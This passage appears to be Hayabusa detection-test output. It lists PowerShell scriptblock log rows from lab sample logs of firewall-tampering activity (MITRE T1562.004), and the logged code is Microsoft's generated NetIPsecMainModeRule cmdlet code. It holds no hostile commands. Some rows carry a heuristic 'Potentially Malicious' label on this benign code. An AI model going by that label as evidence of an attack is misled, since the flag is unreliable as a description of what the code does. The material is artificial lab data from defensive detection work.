([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeRule' -Alias '*' function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletizatio",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeRule' -Alias '*' function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { 